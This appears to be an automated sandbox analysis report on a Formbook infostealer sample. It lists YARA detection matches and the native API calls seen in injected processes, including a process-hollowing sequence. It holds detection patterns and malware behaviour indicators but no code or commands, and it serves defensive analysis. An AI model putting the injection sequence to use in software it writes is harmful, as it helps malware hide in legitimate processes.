          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418180 NtCreateFile,2_2_00418180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418230 NtReadFile,2_2_00418230
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004182B0 NtClose,2_2_004182B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418360 NtAllocateVirtualMemory,2_2_00418360
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041822A NtReadFile,2_2_0041822A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004182AA NtClose,2_2_004182AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041835E NtAllocateVirtualMemory,2_2_0041835E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_03059A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059A20 NtResumeThread,LdrInitializeThunk,2_2_03059A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059A50 NtCreateFile,LdrInitializeThunk,2_2_03059A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_03059910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030599A0 NtCreateSection,LdrInitializeThunk,2_2_030599A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059840 NtDelayExecution,LdrInitializeThunk,2_2_03059840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059860 NtQuerySystemInformation,LdrInitializeThunk,2_2_03059860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030598F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_030598F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059710 NtQueryInformationToken,LdrInitializeThunk,2_2_03059710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059780 NtMapViewOfSection,LdrInitializeThunk,2_2_03059780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030597A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_030597A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059FE0 NtCreateMutant,LdrInitializeThunk,2_2_03059FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_03059660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030596E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_030596E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059540 NtReadFile,LdrInitializeThunk,2_2_03059540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030595D0 NtClose,LdrInitializeThunk,2_2_030595D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059B00 NtSetValueKey,2_2_03059B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0305A3B0 NtGetContextThread,2_2_0305A3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059A10 NtQuerySection,2_2_03059A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059A80 NtOpenDirectoryObject,2_2_03059A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059950 NtQueueApcThread,2_2_03059950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030599D0 NtCreateProcessEx,2_2_030599D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059820 NtEnumerateKey,2_2_03059820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0305B040 NtSuspendThread,2_2_0305B040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030598A0 NtWriteVirtualMemory,2_2_030598A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0305A710 NtOpenProcessToken,2_2_0305A710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059730 NtQueryVirtualMemory,2_2_03059730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059760 NtOpenProcess,2_2_03059760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059770 NtSetInformationFile,2_2_03059770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0305A770 NtOpenThread,2_2_0305A770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059610 NtEnumerateValueKey,2_2_03059610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059650 NtQueryValueKey,2_2_03059650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059670 NtQueryInformationProcess,2_2_03059670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030596D0 NtCreateKey,2_2_030596D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059520 NtWaitForSingleObject,2_2_03059520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0305AD30 NtSetContextThread,2_2_0305AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059560 NtWriteFile,2_2_03059560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030595F0 NtQueryInformationFile,2_2_030595F0
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_05FD00AD NtOpenSection,NtMapViewOfSection,4_2_05FD00AD
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_05FD1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,4_2_05FD1C09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00418180 NtCreateFile,5_2_00418180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00418230 NtReadFile,5_2_00418230
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004182B0 NtClose,5_2_004182B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00418360 NtAllocateVirtualMemory,5_2_00418360
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041822A NtReadFile,5_2_0041822A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004182AA NtClose,5_2_004182AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041835E NtAllocateVirtualMemory,5_2_0041835E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39A50 NtCreateFile,LdrInitializeThunk,5_2_02F39A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39A20 NtResumeThread,LdrInitializeThunk,5_2_02F39A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39A00 NtProtectVirtualMemory,LdrInitializeThunk,5_2_02F39A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F398F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_02F398F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39860 NtQuerySystemInformation,LdrInitializeThunk,5_2_02F39860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39840 NtDelayExecution,LdrInitializeThunk,5_2_02F39840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F399A0 NtCreateSection,LdrInitializeThunk,5_2_02F399A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_02F39910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F396E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02F396E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02F39660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39FE0 NtCreateMutant,LdrInitializeThunk,5_2_02F39FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F397A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02F397A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39780 NtMapViewOfSection,LdrInitializeThunk,5_2_02F39780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39710 NtQueryInformationToken,LdrInitializeThunk,5_2_02F39710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F395D0 NtClose,LdrInitializeThunk,5_2_02F395D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39540 NtReadFile,LdrInitializeThunk,5_2_02F39540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39A80 NtOpenDirectoryObject,5_2_02F39A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39A10 NtQuerySection,5_2_02F39A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F3A3B0 NtGetContextThread,5_2_02F3A3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39B00 NtSetValueKey,5_2_02F39B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F398A0 NtWriteVirtualMemory,5_2_02F398A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F3B040 NtSuspendThread,5_2_02F3B040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39820 NtEnumerateKey,5_2_02F39820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F399D0 NtCreateProcessEx,5_2_02F399D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39950 NtQueueApcThread,5_2_02F39950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F396D0 NtCreateKey,5_2_02F396D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39670 NtQueryInformationProcess,5_2_02F39670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39650 NtQueryValueKey,5_2_02F39650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39610 NtEnumerateValueKey,5_2_02F39610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39770 NtSetInformationFile,5_2_02F39770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F3A770 NtOpenThread,5_2_02F3A770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39760 NtOpenProcess,5_2_02F39760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39730 NtQueryVirtualMemory,5_2_02F39730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F3A710 NtOpenProcessToken,5_2_02F3A710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F395F0 NtQueryInformationFile,5_2_02F395F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39560 NtWriteFile,5_2_02F39560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F3AD30 NtSetContextThread,5_2_02F3AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39520 NtWaitForSingleObject,5_2_02F39520
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759A50 NtCreateFile,LdrInitializeThunk,6_2_03759A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_03759910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037599A0 NtCreateSection,LdrInitializeThunk,6_2_037599A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759860 NtQuerySystemInformation,LdrInitializeThunk,6_2_03759860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759840 NtDelayExecution,LdrInitializeThunk,6_2_03759840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759710 NtQueryInformationToken,LdrInitializeThunk,6_2_03759710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759FE0 NtCreateMutant,LdrInitializeThunk,6_2_03759FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759780 NtMapViewOfSection,LdrInitializeThunk,6_2_03759780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03759660
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759650 NtQueryValueKey,LdrInitializeThunk,6_2_03759650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037596E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_037596E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037596D0 NtCreateKey,LdrInitializeThunk,6_2_037596D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759540 NtReadFile,LdrInitializeThunk,6_2_03759540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037595D0 NtClose,LdrInitializeThunk,6_2_037595D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759B00 NtSetValueKey,6_2_03759B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0375A3B0 NtGetContextThread,6_2_0375A3B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759A20 NtResumeThread,6_2_03759A20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759A10 NtQuerySection,6_2_03759A10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759A00 NtProtectVirtualMemory,6_2_03759A00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759A80 NtOpenDirectoryObject,6_2_03759A80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759950 NtQueueApcThread,6_2_03759950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037599D0 NtCreateProcessEx,6_2_037599D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0375B040 NtSuspendThread,6_2_0375B040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759820 NtEnumerateKey,6_2_03759820
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037598F0 NtReadVirtualMemory,6_2_037598F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037598A0 NtWriteVirtualMemory,6_2_037598A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0375A770 NtOpenThread,6_2_0375A770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759770 NtSetInformationFile,6_2_03759770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759760 NtOpenProcess,6_2_03759760
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759730 NtQueryVirtualMemory,6_2_03759730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0375A710 NtOpenProcessToken,6_2_0375A710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037597A0 NtUnmapViewOfSection,6_2_037597A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759670 NtQueryInformationProcess,6_2_03759670
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759610 NtEnumerateValueKey,6_2_03759610
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759560 NtWriteFile,6_2_03759560
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0375AD30 NtSetContextThread,6_2_0375AD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759520 NtWaitForSingleObject,6_2_03759520
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037595F0 NtQueryInformationFile,6_2_037595F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03258360 NtAllocateVirtualMemory,6_2_03258360
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03258230 NtReadFile,6_2_03258230
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_032582B0 NtClose,6_2_032582B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03258180 NtCreateFile,6_2_03258180
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325835E NtAllocateVirtualMemory,6_2_0325835E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325822A NtReadFile,6_2_0325822A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_032582AA NtClose,6_2_032582AA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D95D0 NtClose,LdrInitializeThunk,10_2_047D95D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_047D9660
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D96E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_047D96E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9FE0 NtCreateMutant,LdrInitializeThunk,10_2_047D9FE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9860 NtQuerySystemInformation,LdrInitializeThunk,10_2_047D9860
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_047D9910
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9560 NtWriteFile,10_2_047D9560
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9540 NtReadFile,10_2_047D9540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047DAD30 NtSetContextThread,10_2_047DAD30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9520 NtWaitForSingleObject,10_2_047D9520
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D95F0 NtQueryInformationFile,10_2_047D95F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9670 NtQueryInformationProcess,10_2_047D9670
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9650 NtQueryValueKey,10_2_047D9650
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9610 NtEnumerateValueKey,10_2_047D9610
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D96D0 NtCreateKey,10_2_047D96D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047DA770 NtOpenThread,10_2_047DA770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9770 NtSetInformationFile,10_2_047D9770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9760 NtOpenProcess,10_2_047D9760
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9730 NtQueryVirtualMemory,10_2_047D9730
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047DA710 NtOpenProcessToken,10_2_047DA710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9710 NtQueryInformationToken,10_2_047D9710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D97A0 NtUnmapViewOfSection,10_2_047D97A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9780 NtMapViewOfSection,10_2_047D9780
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047DB040 NtSuspendThread,10_2_047DB040
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9840 NtDelayExecution,10_2_047D9840
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9820 NtEnumerateKey,10_2_047D9820
